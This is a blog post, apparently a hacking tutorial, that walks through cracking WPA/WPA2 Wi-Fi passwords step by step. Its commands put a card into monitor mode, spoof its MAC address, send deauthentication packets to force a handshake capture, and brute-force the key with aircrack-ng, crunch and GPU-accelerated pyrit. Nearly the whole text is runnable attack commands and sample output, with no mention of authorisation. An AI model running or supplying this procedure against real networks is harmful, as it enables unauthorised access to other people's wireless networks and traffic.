In my last post I was teach you how crack WEP WIFI using Backtrack.Today I will Tell you how crack WPA WIFI so lets start.
(A) General Display card
Step 1 : airmon-ng The result will be something like : Interface Chipset Driver wlan0 Intel 5100 iwlagn - [phy0]
Step 2 : airmon-ng start wlan0
Step 3: (Optional) : Change the mac address of the mon0 interface. ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up
Step 4 : airodump-ng mon0 Then, press "Ctrl+c" to break the program.
Step 5 : airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0 *where -c is the channel -w is the file to be written --bssid is the BSSID This terminal is keeping running.
Step 6 : open another terminal. aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0 *where -a is the BSSID -c is the client MAC address (STATION)
Wait for the handshake.
Step 7 : Use the John the Ripper as word list to crack the WPA/WP2 password. aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
Step 8 (Optional) : If you do not want to use John the Ripper as word list, you can use Crunch. Go to the official site of crunch. http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing). http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz cd crunch-3.0 make make install
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
(B) nVidia Display Card with CUDA If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.
Step a : airmon-ng The result will be something like : Interface Chipset Driver wlan0 Intel 5100 iwlagn - [phy0]
Step b : airmon-ng start wlan0
Step c (Optional) : Change the mac address of the mon0 interface.
ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up
Step d : airodump-ng mon0 Then, press "Ctrl+c" to break the program.
Step e : airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0
Step f : open another terminal. aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0 *where -a is the BSSID -c is the client MAC address (STATION) Wait for the handshake.
Step g : If the following programs are not yet installed, please do it. apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy
Step h : Go to the official site of crunch. http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing). http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz cd crunch-3.0 make make install
Step i :
Go to the official site of pyrit. http://code.google.com/p/pyrit/downloads/list Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).
tar -xzvf pyrit-0.4.0.tar.gz cd pyrit-0.4.0 python setup.py build sudo python setup.py install
tar -xzvf cpyrit-cuda-0.4.0.tar.gz cd cpyrit-cuda-0.4.0 python setup.py build sudo python setup.py install
Step j : /pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
Step k (Optional) : If you encounter error when reading the wpacrack-01.cap, you should do the following step. pyrit -r wpacrack-01.cap -o new.cap stripLive
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
Step l : Then, you will see something similar to the following. Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com This code is distributed under the GNU General Public License v3+ Parsing file 'new.cap' (1/1)... Parsed 71 packets (71 802.11-packets), got 55 AP(s) Tried 17960898 PMKs so far; 17504 PMKs per second
Note :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.
To test if your wireless card (either USB or PCI-e) can do the injection or not :
airodump-ng mon0 Open another terminal. aireplay-ng -9 mon0
Make sure pyrit workable on your system : pyrit list_cores
0 comments:
Post a Comment